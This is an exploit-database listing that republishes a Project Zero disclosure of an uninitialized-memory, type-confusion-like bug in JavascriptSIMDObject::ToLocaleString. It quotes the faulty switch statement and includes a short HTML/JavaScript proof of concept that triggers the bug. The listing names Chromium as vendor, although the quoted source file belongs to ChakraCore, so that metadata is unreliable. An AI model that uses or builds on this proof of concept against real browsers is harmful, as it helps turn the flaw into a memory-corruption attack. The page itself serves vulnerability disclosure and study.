header-logo
Suggest Exploit
vendor:
Chromium
by:
Project Zero
7,5
CVSS
HIGH
Type Confusion
843
CWE
Product Name: Chromium
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

JavascriptSIMDObject::ToLocaleString Type Confusion

If the call has more than three arguments, it will fall through, leaving newArgs uninitialized. This will cause toLocaleString to be called on uninitialized memory, having a similar effect to type confusion (as integers in the memory can be confused for pointers and vice-versa). A minimal PoC is as follows, and a full PoC is attached: var v = SIMD.Int32x4(1, 2, 3, 4); v.toLocaleString(1, 2, 3, 4, 5, 6, 7);

Mitigation:

Ensure that all arguments passed to toLocaleString are properly initialized.
Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=961

The following code occurs in JavascriptSIMDObject::ToLocaleString in JavascriptSimdObject.cpp:

        Var* newArgs = HeapNewArray(Var, numArgs);
        switch (numArgs)
        {
        case 1:
            break;
        case 2:
            newArgs[1] = args[1];
            break;
        case 3:
            newArgs[1] = args[1];
            newArgs[2] = args[2];
            break;
        default:
            Assert(UNREACHED);
        }

If the call has more than three arguments, it will fall through, leaving newArgs uninitialized. This will cause toLocaleString to be called on uninitialized memory, having a similar effect to type confusion (as integers in the memory can be confused for pointers and vice-versa). A minimal PoC is as follows, and a full PoC is attached:

    var v = SIMD.Int32x4(1, 2, 3, 4);
    v.toLocaleString(1, 2, 3, 4)
-->

<html><body><script>
    try{
    var v = SIMD.Int32x4(1, 2, 3, 4);
    alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7));
	}catch(e){
	alert(e.message);

}
</script></body></html>

Navigation

Suggest Exploit

Services By CQR